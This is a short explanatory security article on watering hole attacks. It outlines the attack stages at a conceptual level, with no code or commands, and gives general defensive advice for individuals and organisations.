A WATERING HOLE ATTACK is a highly-targeted exploit in which the perpetrator seeks to compromise a website users frequent. Like food chains in natural science, the perpetrators await their victims like a predator awaits other living organisms. If baiting you with their malicious traps proves to be unsuccessful, they revise their strategy until an encounter is realized.
How a Watering Hole Attack is Implemented
True watering hole attacks vary and are implemented accordingly, but the basic steps of each are outlined as follows:
Here, the perpetrator of a watering hole attack creates an account with the larger website to gather intelligence on smaller websites they partner with. This is easy in most cases since companies tend to list their strategic partners in the ‘About’ section of their websites. Profiling is a critical step in the watering hole process as the perpetrator can learn about other websites their victims are likely to visit.
In this stage, the perpetrator becomes an attacker. They scan the smaller website for gaps and vulnerabilities in its code that can be taken advantage of. The more vulnerabilities that are discovered, the better.
Now the ball is in the victim’s court. Eventually, they will make their routine visit to the smaller website, which is now infected with malicious code. If the victim is not making use of endpoint security (which would scan for and patch vulnerabilities without user interaction), the malicious code will invoke both quietly and quickly. The user is redirected to a site which hosts additional malware, and the outcome might involve the embedding of Trojans and keyloggers. The ultimate goal is the collection of usernames, passwords and other sensitive data.
How to Protect Yourself
Hashing, encryption and endpoint security from reliable anti malware and antivirus (AV) programs are surefire ways to protect yourself against a watering hole attack. You should also make use of firewalls and ensure they are properly configured and updated.
For organizations with full-time staff, random website inspections that employees visit are strongly advised. This includes internal websites and even intranet sites, as these too are common targets. If any are identified as being infected, immediately block all incoming and outgoing traffic to them.
Finally, you should educate employees with access to key information about such attacks while promoting sound use policies. Coupled with network monitoring tools that listen for suspicious file transfers, your group or organization will be in the best position for countering a watering hole attack.